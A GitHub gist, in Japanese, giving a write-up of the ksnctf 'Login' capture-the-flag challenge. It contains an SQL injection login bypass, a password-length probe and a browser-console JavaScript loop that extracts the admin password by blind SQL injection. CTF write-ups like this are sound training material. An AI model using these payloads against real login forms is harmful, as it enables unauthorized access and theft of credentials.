Skip to content

Instantly share code, notes, and snippets.

@okwrtdsh
Last active February 3, 2019 19:29
Show Gist options
  • Save okwrtdsh/52b932d1d142f20fcc1df896548cfb43 to your computer and use it in GitHub Desktop.
Save okwrtdsh/52b932d1d142f20fcc1df896548cfb43 to your computer and use it in GitHub Desktop.

ksnctf Login write-up

http://ksnctf.sweetduet.info/problem/6

  1. adminでログインしろと言われるのでとりあえず、SQLインジェクション pass: ' OR 1=1;--
  2. adminのpasswordがflagだと言われる
  3. passwordの長さを求める pass: ' OR (SELECT length(pass) FROM user WHERE id='admin') < 22;--
  4. 21だと分かるので適当にconsoleでjsを書く
  • jQuery読み込む
var jq = document.createElement('script');
jq.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);
  • ajaxでpostしてCongratulationsが返ってきた場合に表示する
var flag = '';
var post = function(i, c){$.post(".",{id: "admin", pass: "' OR (SELECT substr (pass,"+i+",1) FROM user WHERE id='admin') = '"+c+"';--"}).done(function(data){if(data.includes("Congratulations")){flag+=c;console.log(i,c);}});}
  • あとは待つだけ
for(j=1;j<22;j++)for(i=48;i<123;i++){post(j, String.fromCharCode(i))}
  1. flag
console.log(flag);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment